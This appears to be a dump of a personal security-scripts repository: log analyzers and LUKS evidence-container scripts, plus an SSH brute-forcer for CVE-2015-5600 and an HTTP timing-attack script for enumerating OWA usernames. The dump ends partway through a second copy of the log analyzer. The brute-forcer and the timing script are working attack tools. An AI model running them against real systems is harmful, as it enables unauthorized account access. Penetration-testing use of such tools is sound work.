├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── auxillary
    ├── apache_log_details.sh
    ├── brute_forcer
    │   └── ssh
    │   │   └── kdb_interative_CVE-2015-5600_bruteforce.sh
    ├── evidence_management
    │   └── luks_container
    │   │   ├── close_container.sh
    │   │   ├── create_container.sh
    │   │   └── open_container.sh
    ├── http
    │   └── http_timing_attack.py
    ├── log_analyzers
    │   └── apache_log_details.sh
    ├── proxies
    │   └── simple_http_proxy.py
    └── pyinstaller-exe-compile.sh
├── enumeration
    ├── banner-grabber.py
    ├── dns
    │   └── zone-transfer.sh
    ├── fully-detailed-nmap-scan.sh
    ├── osint
    │   └── org2linkedin
    │   │   ├── README.md
    │   │   ├── config.exmpl.cfg
    │   │   └── org2linkedin.py
    ├── shodan
    │   ├── shodan_dns_resolve.sh
    │   ├── shodan_dns_reverse.sh
    │   ├── shodan_ip_info.sh
    │   ├── shodan_ip_scan.sh
    │   ├── shodan_labs_honeyscore.sh
    │   ├── shodan_sysinfo_account_profile.sh
    │   ├── shodan_sysinfo_api-info.sh
    │   ├── shodan_sysinfo_profile-info.sh
    │   ├── shodan_sysinfo_scanstatus.sh
    │   ├── shodan_sysinfo_tools-myip.sh
    │   ├── shodan_sysinfo_what-ports.sh
    │   ├── shodan_sysinfo_what-protocols.sh
    │   └── shodan_sysinfo_what-services.sh
    ├── smb
    │   └── smb_enum.sh
    ├── smtp
    │   ├── namelist
    │   ├── vrfy_enum.py
    │   └── vrfy_wrapper.sh
    ├── snmp
    │   └── snmp_checker.sh
    └── ssl
    │   └── ssl_cert_details.py
├── exploit-development
    ├── auxillary
    │   ├── host_pwnable.sh
    │   ├── pattern.py
    │   └── shellcode_to_hex.sh
    ├── fuzzers
    │   └── network_service_fuzzer.py
    ├── obfuscators
    │   └── vba_str_to_chr
    │   │   ├── chr_table.txt
    │   │   └── conv_str.sh
    ├── tcp_exploit_skeleton.py
    ├── udp_exploit_skeleton.py
    └── win32
    │   ├── binders
    │       └── poor_mans_binder.py
    │   └── buffer-overflows
    │       └── win32-buffer-overflow-development-and-exploitation-skeleton.py
├── exploit
    └── web
    │   └── heartbleed-tester.py
├── file-transfers
    └── ftp
    │   └── small_ftp_server.py
└── post-exploit
    └── linux
        └── find_bitcoin_addresses.sh


/.gitattributes:
--------------------------------------------------------------------------------
1 | * text=auto eol=lf
2 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | enumeration/shodan/SHODAN_API_KEY
2 | enumeration/osint/org2linkedin/config.cfg
3 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 2, June 1991
  3 | 
  4 |  Copyright (C) 1989, 1991 Free Software Foundation, Inc., <http://fsf.org/>
  5 |  51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
  6 |  Everyone is permitted to copy and distribute verbatim copies
  7 |  of this license document, but changing it is not allowed.
  8 | 
  9 |                             Preamble
 10 | 
 11 |   The licenses for most software are designed to take away your
 12 | freedom to share and change it.  By contrast, the GNU General Public
 13 | License is intended to guarantee your freedom to share and change free
 14 | software--to make sure the software is free for all its users.  This
 15 | General Public License applies to most of the Free Software
 16 | Foundation's software and to any other program whose authors commit to
 17 | using it.  (Some other Free Software Foundation software is covered by
 18 | the GNU Lesser General Public License instead.)  You can apply it to
 19 | your programs, too.
 20 | 
 21 |   When we speak of free software, we are referring to freedom, not
 22 | price.  Our General Public Licenses are designed to make sure that you
 23 | have the freedom to distribute copies of free software (and charge for
 24 | this service if you wish), that you receive source code or can get it
 25 | if you want it, that you can change the software or use pieces of it
 26 | in new free programs; and that you know you can do these things.
 27 | 
 28 |   To protect your rights, we need to make restrictions that forbid
 29 | anyone to deny you these rights or to ask you to surrender the rights.
 30 | These restrictions translate to certain responsibilities for you if you
 31 | distribute copies of the software, or if you modify it.
 32 | 
 33 |   For example, if you distribute copies of such a program, whether
 34 | gratis or for a fee, you must give the recipients all the rights that
 35 | you have.  You must make sure that they, too, receive or can get the
 36 | source code.  And you must show them these terms so they know their
 37 | rights.
 38 | 
 39 |   We protect your rights with two steps: (1) copyright the software, and
 40 | (2) offer you this license which gives you legal permission to copy,
 41 | distribute and/or modify the software.
 42 | 
 43 |   Also, for each author's protection and ours, we want to make certain
 44 | that everyone understands that there is no warranty for this free
 45 | software.  If the software is modified by someone else and passed on, we
 46 | want its recipients to know that what they have is not the original, so
 47 | that any problems introduced by others will not reflect on the original
 48 | authors' reputations.
 49 | 
 50 |   Finally, any free program is threatened constantly by software
 51 | patents.  We wish to avoid the danger that redistributors of a free
 52 | program will individually obtain patent licenses, in effect making the
 53 | program proprietary.  To prevent this, we have made it clear that any
 54 | patent must be licensed for everyone's free use or not licensed at all.
 55 | 
 56 |   The precise terms and conditions for copying, distribution and
 57 | modification follow.
 58 | 
 59 |                     GNU GENERAL PUBLIC LICENSE
 60 |    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
 61 | 
 62 |   0. This License applies to any program or other work which contains
 63 | a notice placed by the copyright holder saying it may be distributed
 64 | under the terms of this General Public License.  The "Program", below,
 65 | refers to any such program or work, and a "work based on the Program"
 66 | means either the Program or any derivative work under copyright law:
 67 | that is to say, a work containing the Program or a portion of it,
 68 | either verbatim or with modifications and/or translated into another
 69 | language.  (Hereinafter, translation is included without limitation in
 70 | the term "modification".)  Each licensee is addressed as "you".
 71 | 
 72 | Activities other than copying, distribution and modification are not
 73 | covered by this License; they are outside its scope.  The act of
 74 | running the Program is not restricted, and the output from the Program
 75 | is covered only if its contents constitute a work based on the
 76 | Program (independent of having been made by running the Program).
 77 | Whether that is true depends on what the Program does.
 78 | 
 79 |   1. You may copy and distribute verbatim copies of the Program's
 80 | source code as you receive it, in any medium, provided that you
 81 | conspicuously and appropriately publish on each copy an appropriate
 82 | copyright notice and disclaimer of warranty; keep intact all the
 83 | notices that refer to this License and to the absence of any warranty;
 84 | and give any other recipients of the Program a copy of this License
 85 | along with the Program.
 86 | 
 87 | You may charge a fee for the physical act of transferring a copy, and
 88 | you may at your option offer warranty protection in exchange for a fee.
 89 | 
 90 |   2. You may modify your copy or copies of the Program or any portion
 91 | of it, thus forming a work based on the Program, and copy and
 92 | distribute such modifications or work under the terms of Section 1
 93 | above, provided that you also meet all of these conditions:
 94 | 
 95 |     a) You must cause the modified files to carry prominent notices
 96 |     stating that you changed the files and the date of any change.
 97 | 
 98 |     b) You must cause any work that you distribute or publish, that in
 99 |     whole or in part contains or is derived from the Program or any
100 |     part thereof, to be licensed as a whole at no charge to all third
101 |     parties under the terms of this License.
102 | 
103 |     c) If the modified program normally reads commands interactively
104 |     when run, you must cause it, when started running for such
105 |     interactive use in the most ordinary way, to print or display an
106 |     announcement including an appropriate copyright notice and a
107 |     notice that there is no warranty (or else, saying that you provide
108 |     a warranty) and that users may redistribute the program under
109 |     these conditions, and telling the user how to view a copy of this
110 |     License.  (Exception: if the Program itself is interactive but
111 |     does not normally print such an announcement, your work based on
112 |     the Program is not required to print an announcement.)
113 | 
114 | These requirements apply to the modified work as a whole.  If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works.  But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 | 
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 | 
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 | 
134 |   3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 | 
138 |     a) Accompany it with the complete corresponding machine-readable
139 |     source code, which must be distributed under the terms of Sections
140 |     1 and 2 above on a medium customarily used for software interchange; or,
141 | 
142 |     b) Accompany it with a written offer, valid for at least three
143 |     years, to give any third party, for a charge no more than your
144 |     cost of physically performing source distribution, a complete
145 |     machine-readable copy of the corresponding source code, to be
146 |     distributed under the terms of Sections 1 and 2 above on a medium
147 |     customarily used for software interchange; or,
148 | 
149 |     c) Accompany it with the information you received as to the offer
150 |     to distribute corresponding source code.  (This alternative is
151 |     allowed only for noncommercial distribution and only if you
152 |     received the program in object code or executable form with such
153 |     an offer, in accord with Subsection b above.)
154 | 
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it.  For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable.  However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 | 
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 | 
172 |   4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License.  Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 | 
180 |   5. You are not required to accept this License, since you have not
181 | signed it.  However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works.  These actions are
183 | prohibited by law if you do not accept this License.  Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 | 
189 |   6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions.  You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 | 
197 |   7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License.  If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all.  For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 | 
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 | 
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices.  Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 | 
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 | 
229 |   8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded.  In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 | 
237 |   9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time.  Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 | 
242 | Each version is given a distinguishing version number.  If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation.  If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 | 
250 |   10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission.  For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this.  Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 | 
258 |                             NO WARRANTY
259 | 
260 |   11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 | 
270 |   12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 | 
280 |                      END OF TERMS AND CONDITIONS
281 | 
282 |             How to Apply These Terms to Your New Programs
283 | 
284 |   If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 | 
288 |   To do so, attach the following notices to the program.  It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 | 
293 |     {description}
294 |     Copyright (C) {year}  {fullname}
295 | 
296 |     This program is free software; you can redistribute it and/or modify
297 |     it under the terms of the GNU General Public License as published by
298 |     the Free Software Foundation; either version 2 of the License, or
299 |     (at your option) any later version.
300 | 
301 |     This program is distributed in the hope that it will be useful,
302 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
303 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
304 |     GNU General Public License for more details.
305 | 
306 |     You should have received a copy of the GNU General Public License along
307 |     with this program; if not, write to the Free Software Foundation, Inc.,
308 |     51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 | 
310 | Also add information on how to contact you by electronic and paper mail.
311 | 
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 | 
315 |     Gnomovision version 69, Copyright (C) year name of author
316 |     Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 |     This is free software, and you are welcome to redistribute it
318 |     under certain conditions; type `show c' for details.
319 | 
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License.  Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 | 
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary.  Here is a sample; alter the names:
328 | 
329 |   Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 |   `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 | 
332 |   {signature of Ty Coon}, 1 April 1989
333 |   Ty Coon, President of Vice
334 | 
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs.  If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library.  If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 | 
341 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # security-scripts
2 | Small, one-off scripts for security related stuff I've written over time
3 | 


--------------------------------------------------------------------------------
/auxillary/apache_log_details.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Menu-driven collection from an apache access.log file
 3 | # USAGE:
 4 | #       $0 /path/to/access.log
 5 | #       $0
 6 | 
 7 | if [ -z "$1" ]; then
 8 |     read -p "Provide the path to your access.log: " access_log
 9 |     if [ ! -f $access_log ]; then
10 |         echo "File not found!"
11 |         exit 1
12 |     fi
13 | else [ ! -f $1 ];
14 |     echo "File not found!";
15 |     exit 2;
16 | fi
17 | 
18 | echo -e "Connections made:\n"
19 | cat $access_log |cut -d " " -f 1 |sort | uniq -c |sort -urn
20 | echo -e "\nPlease wait, this next part can take a bit...\n"
21 | echo -e "Finding files by access\n"
22 | for ip in $(cat $access_log |cut -d " " -f 1 |sort | uniq -c |sort -urn | awk '{print $2}'); do cat $access_log| grep $ip |cut -d "\"" -f 2 |uniq -c; done |sort -u
23 | 
24 | # read -p "Provide what you wish to investiage further: " inv_menu;
25 | echo "Provide what you wish to investiagate further: "
26 | options=("Specific Address" "Specific file accessed by specific ip address" "Exit")
27 | select inv_menu in "${options[@]}"; do
28 |      case $inv_menu in
29 |          "Specific Address" ) read -p "Provide the IP address: " inv_address;
30 |              echo -e "Pages accessed by $inv_address by count:\n";
31 |              cat $access_log |grep "$inv_address" | cut -d "\"" -f 2 |uniq -c;; #&
32 |          "Specific file accessed by specific ip address" ) if [ -z "$inv_address" ];
33 |                 then
34 |                         echo -e "INFO: No IP address cached\n";
35 |                         read -p "Provide the IP address: " inv_address;
36 |                 else
37 |                         read -p "Want to use $inv_address as the IP address? (y/n)" yn
38 |                         case $yn in
39 |                                 [Yy]* ) ;;
40 |                                 [Nn]* ) read -p "Provide the IP address: " $inv_address;;
41 |                                 * ) echo "Please answer yes or no." ;;
42 |                         esac
43 |                 fi
44 |                 read -p "Provide all or part of the file name you want to see requests for: " http_file;
45 |                 echo -e "Unique requests for $inv_address on $http_file\n";
46 |                 if [[ $http_file == "" ]]; then
47 |                         echo -e "WARNING! No file name provided!"
48 |                 else
49 |                         cat $access_log | grep "$inv_address" | cut -d "\"" -f 2 | uniq -c;
50 |                         echo -e "Number of response codes for $inv_address on $http_file\n";
51 |                         cat $access_log | grep "$inv_address" | grep "$http_file" | sort -u | awk {'print $9'} | uniq -c;
52 |                         read -p "Provide response code to read from, else 'return' " inv_rescode;
53 |                                 if [[ $inv_rescode == "return" ]]; then
54 |                                         echo "INFO: Returning"; #&
55 |                                 elif [[ $inv_rescode == "Exit" || $inv_rescode == "exit" || $inv_rescode == "Quit" || $inv_rescode == "quit*" ]]; then
56 |                                         exit 0;
57 |                                 else
58 |                                         if [[ ! -z "$inv_rescode" ]]; then
59 |                                                 echo -e "$inv_rescode requests by $inv_address:\n";
60 |                                                 cat $access_log |grep $inv_address |grep $http_file|grep $inv_rescode;
61 |                                         else
62 |                                                 echo -e "All requests by $inv_address\n";
63 |                                                 cat $access_log |grep $inv_address |grep $http_file;
64 |                                         fi
65 |                                 fi
66 |                 fi;;
67 |          "Exit" ) echo "Exiting...";
68 |                         exit 0;;
69 |          *) echo "Select from the menu";; #&
70 |      esac
71 | done
72 | 


--------------------------------------------------------------------------------
/auxillary/brute_forcer/ssh/kdb_interative_CVE-2015-5600_bruteforce.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Credit to Kingcope
 3 | # Brute forcer for CVE-2015-5600
 4 | 
 5 | USAGE="USAGE: cat wordlist.txt | $0 <ssh-username> <ssh-target>"
 6 | 
 7 | if [[ "$1" == $NULL ]]; then
 8 | 	echo $USAGE
 9 | 	exit 1
10 | elif [[ "$2" == $NULL ]]; then
11 | 	echo $USAGE
12 | 	exit 2
13 | else
14 | 	echo "Starting..."
15 | fi
16 | 
17 | while true
18 | do
19 | read password
20 | sshpass -p "$password" ssh -l$1 -oKbdInteractiveDevices=`perl -e 'print "pam," x10000'` $2
21 | rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
22 | echo "Respawn due to login grace time..."
23 | done
24 | 


--------------------------------------------------------------------------------
/auxillary/evidence_management/luks_container/close_container.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [[ $EUID -ne 0 ]]; then
 4 | 	echo "This must be ran as root"
 5 | 	exit 1
 6 | fi
 7 | 
 8 | source /tmp/.lukscryptinfo
 9 | umount /mnt/$volume_name
10 | cryptsetup luksClose $volume_name
11 | if [ ! -z "$volume_name" ] then
12 | 	rmdir /mnt/$volume_name
13 | fi
14 | shred -z -n 5 -u -f /tmp/.lukscryptinfo
15 | 


--------------------------------------------------------------------------------
/auxillary/evidence_management/luks_container/create_container.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [[ $EUID -ne 0 ]]; then
 4 | 	echo "This script must be run as root" 
 5 | 	exit 1
 6 | fi
 7 | 
 8 | # Script will create the encrypted LUKS container, and format it with ext4
 9 | read -p "What size should the container be in MB? (512): " container_size
10 | read -p "Where should we store the container? (/root/container): " container_path
11 | dd if=/dev/urandom of=$container_path bs=1M count=$container_size
12 | 
13 | cryptsetup -y luksFormat $container_path
14 | cryptsetup -y luksOpen $container_path somerndvolume
15 | 
16 | mkfs.ext4 -j /dev/mapper/somerndvolume
17 | echo "Container is formatted with ext4"
18 | 
19 | cryptsetup luksClose somerndvolume
20 | 


--------------------------------------------------------------------------------
/auxillary/evidence_management/luks_container/open_container.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # opens the luks container
 3 | 
 4 | if [[ $EUID -ne 0 ]]; then
 5 | 	echo "This script must be run as root" 
 6 | 	exit 1
 7 | fi
 8 | 
 9 | 
10 | if [[ $# -eq 0 ]]; then
11 | 	echo "USAGE: $0 -f </path/to/container> -n <volume name to use>"
12 | 	exit 0
13 | fi
14 | 
15 | while [[ $# > 1 ]] 
16 | do
17 | 	key="$1"
18 | 	case $key in
19 | 		-f)
20 | 		container_path="$2"
21 | 		shift;;
22 | 		-n)
23 | 		volume_name="$2"
24 | 		shift;;
25 | 		*)
26 | 		echo "USAGE: $0 -f </path/to/container> -n <volume name to use>"
27 | 		exit 0;;
28 | 	esac
29 | 	shift
30 | done
31 | 
32 | cryptsetup luksOpen $container_path $volume_name
33 | mkdir -p /mnt/$volume_name
34 | mount /dev/mapper/$volume_name /mnt/$volume_name
35 | 
36 | 
37 | 
38 | echo "volume_name=$volume_name" >/tmp/.lukscryptinfo
39 | echo "Volume has been mounted at /mnt/$volume_name"
40 | 


--------------------------------------------------------------------------------
/auxillary/http/http_timing_attack.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # Multiprocessed HTTP Timing attack tester
 3 | # MAKE SURE YOU READ THE INSTRUCTIONS CAREFULLY
 4 | # I just pull the request out of burpsuite using the "Copy as Python-Requests" extension
 5 | # Und3rf10w
 6 | 
 7 | import requests
 8 | import threading
 9 | import time
10 | import argparse
11 | from sys import argv,exc_info
12 | from multiprocessing import Pool, freeze_support
13 | import itertools
14 | 
15 | parser = argparse.ArgumentParser(prog=str(argv[0]), usage='%(prog)s [options]', description='Utility to perform timing attacks against HTTP services such as OWA')
16 | parser.add_argument('-t', "--timeout", type=int, help="Number of seconds to wait before timing out on request", required=False, default=5)
17 | parser.add_argument('-T', "--threads", type=int, help="Number of threads to use", required=False, default=1)
18 | parser.add_argument('-f', "--filepath", type=str, help="Path to file containing values to fuzz", required=True)
19 | parser.add_argument('-o', "--outfile", type=str, help="Path of file to write results to", required=False, default=None)
20 | parser.add_argument('-d', "--debug", help="Show debugging info (implies --verbose)", required=False, default=False, action='store_true')
21 | parser.add_argument('-v', "--verbose", help="Show verbose output", required=False, default=False, action='store_true')
22 | 
23 | args = parser.parse_args()
24 | 
25 | timeoutval = args.timeout
26 | threads = args.threads
27 | filepath = args.filepath
28 | outfile = args.outfile
29 | debug = args.debug
30 | verbose = args.verbose
31 | 
32 | if debug == True:
33 |         verbose = True
34 | 
35 | 
36 | def main():
37 |         assign_file_to_list(filepath) # returns fuzzvals list
38 |         pool = Pool(threads)
39 |         print "Press CTRL + \\ if you need to exit"
40 |         pool.map(postreq_wrapper, itertools.izip(fuzzvals, itertools.repeat(timeoutval), itertools.repeat(outfile)))
41 | 
42 | 
43 | def assign_file_to_list(filepath):
44 |         global fuzzvals
45 |         f = open(filepath, "r")
46 |         org_fuzzvals = sorted(f.readlines())
47 |         fuzzvals = []
48 |         f.close()
49 |         for i in range(len(org_fuzzvals)):
50 |                 fuzzvals.append(org_fuzzvals[i].strip('\n'))
51 |         return fuzzvals
52 | 
53 | def postreq_wrapper(args):
54 |         return postreq(*args)
55 | 
56 | def postreq(fuzzval, timeoutval, outfile):
57 |         try:
58 |                 if debug == True:
59 |                         print "DEBUG: current fuzzval %s" % str(fuzzval)
60 |                         start_time = time.time()
61 |                 # requests pulled from burpsuite extension: Copy as Python-Requests
62 |                 # ensure that you add timeout=timeoutval before the last ')' and after the last '}' in your request
63 |                 # REPLACE THE FOLLOWING LINE, NOTING THE LOCATION OF 'str(fuzzval)' AND 'timeout=timeoutval'
64 |                 r = requests.post("https://mail.example.com:443/owa/auth.owa", headers={"User-Agent": "Mozilla/5.0 legit user agent", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Cookie": "ClientId=XXXXXXXXXXXXXXX; PrivateComputer=true", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}, data={"destination": "https://mail.example.com/owa/", "flags": "4", "forcedownlevel": "0", "username": str(fuzzval), "password": "itdoesntevenmatter", "passwordText": "", "isUtf8": "1"}, timeout=timeoutval)
65 |                 if verbose == True:
66 |                         print "INFO: Value %s succeded" % str(fuzzval)
67 |                 if debug == True:
68 |                         print "DEBUG: %s seconds for this request to complete" % (time.time() - start_time )
69 |                         print "DEBUG: Request returned %d" % r.status_code
70 |                 if outfile != None:
71 |                         o = open(outfile, "a")
72 |                         o.write(fuzzval + '\n')
73 |                         o.close()
74 |                 else:
75 |                         print "%s" % fuzzval
76 |         except requests.exceptions.ReadTimeout:
77 |                 if verbose == True:
78 |                         print "INFO: Value %s didn't work because the request timed out" % str(fuzzval)
79 |                 pass
80 |         except:
81 |                 print "ERROR: An unhandled exception was raised, skipping test for value: %s" % str(fuzzval)
82 |                 print exc_info()[0]
83 |                 pass
84 | 
85 | 
86 | if __name__=="__main__":
87 |         freeze_support()
88 |         main()
89 | 
90 | 


--------------------------------------------------------------------------------
/auxillary/log_analyzers/apache_log_details.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Menu-driven collection from an apache access.log file
 3 | # USAGE:
 4 | #       $0 /path/to/access.log
 5 | #       $0
 6 | 
 7 | if [ -z "$1" ]; then
 8 |     read -p "Provide the path to your access.log: " access_log
 9 |     if [ ! -f $access_log ]; then
10 |         echo "File not found!"
11 |         exit 1
12 |     fi
13 | else [ ! -f $1 ];
14 |     echo "File not found!";
15 |     exit 2;
16 | fi
17 | 
18 | echo -e "Connections made:\n"
19 | cat $access_log |cut -d " " -f 1 |sort | uniq -c |sort -urn
20 | echo -e "\nPlease wait, this next part can take a bit...\n"
21 | echo -e "Finding files by access\n"
22 | for ip in $(cat $access_log |cut -d " " -f 1 |sort | uniq -c |sort -urn | awk '{print $2}'); do cat $access_log| grep $ip |cut -d "\"" -f 2 |uniq -c; done |sort -u
23 | 
24 | # read -p "Provide what you wish to investiage further: " inv_menu;
25 | echo "Provide what you wish to investigate further: "
26 | options=("Specific Address" "Specific file accessed by specific ip address" "Exit")
27 | select inv_menu in "${options[@]}"; do
28 |      case $inv_menu in
29 |          "Specific Address" ) read -p "Provide the IP address: " inv_address;
30 |              echo -e "Pages accessed by $inv_address by count:\n";
31 |              cat $access_log |grep "$inv_address" | cut -d "\"" -f 2 |uniq -c;; #&
32 |          "Specific file accessed by specific ip address" ) if [ -z "$inv_address" ];
33 |                 then
34 |                         echo "INFO: No IP address cached";
35 |                         read -p "Provide the IP address: " inv_address;
36 |                 else
37 |                         read -p "Want to use $inv_address as the IP address? " yn
38 |                         case $yn in
39 |                                 [Yy]* ) ;;
40 |                                 [Nn]* ) read -p "Provide the IP address: " $inv_address;;
41 |                                 * ) echo "Please answer yes or no." ;;
42 | 			esac
43 |                 fi
44 |                 read -p "Provide all or part of the file name you want to see requests for: " http_file;
45 |                 echo -e "Unique requests for $inv_address on $http_file\n";
46 |                 cat $access_log | grep "$inv_address" | cut -d "\"" -f 2 | uniq -c;
47 |                 echo -e "Number of response codes for $inv_address on $http_file\n";
48 |                 cat $access_log | grep "$inv_address" | grep "$http_file" | sort -u | awk {'print $9'} | uniq -c; 
49 |                 read -p "Provide response code to read from, else 'return' " inv_rescode;
50 |                 if [ $inv_rescode == "return" ]; then
51 |                         echo "INFO: Returning"; #&
